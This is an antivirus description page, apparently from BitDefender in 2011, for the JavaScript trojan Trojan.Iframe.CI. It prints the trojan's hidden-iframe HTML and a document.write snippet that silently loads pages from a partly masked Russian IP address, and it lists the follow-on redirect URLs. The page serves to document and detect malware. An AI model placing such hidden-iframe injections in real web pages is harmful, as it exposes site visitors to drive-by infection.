Home / malwarePDF  

Trojan.Iframe.CI


First posted on 21 November 2011.
Source: BitDefender

Aliases :

Trojan.Iframe.CI is also known as Trojan-Clicker.JS.Agent.h, TrojanDownloader:JS/Psyme.gen.

Explanation :

This is a malicious JavaScript, which may be downloaded unknowingly by a user when visiting various infected websites. It contains code for displaying a hidden iframe:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>

and an encrypted code which points to:

<SCRIPT>window.status='Done';document.write('<iframe name=[random_nr] src='http://77.221.133.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]' width=303 height=93 style='display: none'></iframe>')</SCRIPT>

and redirects the browser to a malicious website:

"http://77.221.133.X/.if/go.html?[random_nr]", an IP address hosted in Russia ([removed]atapoint.ru).

Reaching here, the user may be getting infected with other malware and be redirected to pages like:

http://77.221.133.X/.dif/go.php?sid=1
http://77.221.133.X/.sp/in.cgi?p=o

which also contain hidden iframes:

<iframe src="http://77.221.133.X/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Last update 21 November 2011

 

TOP